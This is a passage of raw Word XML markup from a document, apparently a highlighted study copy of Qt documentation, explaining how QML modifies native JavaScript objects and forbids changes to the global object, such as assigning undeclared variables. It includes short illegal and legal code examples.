      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>List of JavaScript Objects and Functions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="0045447C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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Note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML makes the following modifications to native objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:anchor="arg-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>arg()</w:t>
        </w:r>
      </w:hyperlink>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function is added to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>String</w:t>
        </w:r>
      </w:hyperlink>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prototype.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="0045447C" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Locale-aware conversion functions are added to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Date</w:t>
        </w:r>
      </w:hyperlink>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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Number</w:t>
        </w:r>
      </w:hyperlink>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prototypes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003249C1" w:rsidRPr="00D815C8" w:rsidRDefault="003249C1" w:rsidP="008B6FAC">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc483000547"/>
      <w:bookmarkStart w:id="111" w:name="_Toc483603906"/>
      <w:bookmarkStart w:id="112" w:name="_Toc483605126"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Environment Restrictions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="003249C1" w:rsidRPr="00D815C8" w:rsidRDefault="003249C1" w:rsidP="003249C1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML implements the following restrictions for JavaScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003249C1" w:rsidRPr="00D815C8" w:rsidRDefault="003249C1" w:rsidP="000D7D84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc483000548"/>
      <w:bookmarkStart w:id="114" w:name="_Toc483003572"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript code written </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6FAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in a</w:t>
      </w:r>
      <w:r w:rsidRPr="008B6FAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6FAC">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="008B6FAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6FAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">file cannot modify the global </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. JavaScript code </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6FAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in a .js file can modify the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6FAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>global object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and those modifications will be visible to the .qml file when</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:anchor="importing-a-javascript-resource-from-a-qml-document" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>imported</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="003249C1" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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In QML, the global object is constant - existing properties cannot be modified or deleted, and no new properties may be created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="000D7D84" w:rsidRDefault="003249C1" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Most JavaScript programs do not intentionally modify the global object. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript's automatic creation of undeclared variables</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an implicit modification of the global object, and </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is prohibited in QML</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C7D" w:rsidRPr="00D815C8" w:rsidRDefault="001B53A1" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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Assuming that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable does not exist in the scope chain, the following code is </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>illegal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in QML:</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// Illegal modification of undeclared variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="000D7D84"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262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>a = 1;</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for</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ii = </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 xml:space="preserve">; ii &lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>; ++ii)</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 = a * ii;</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console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Result: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="00C33FBA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="24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 xml:space="preserve">It can be trivially modified to this </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>legal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="000D7D84"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262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>var a = 1;</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for</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ii = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; ii &lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>; ++ii)</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 = a * ii;</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console.log(</w:t>
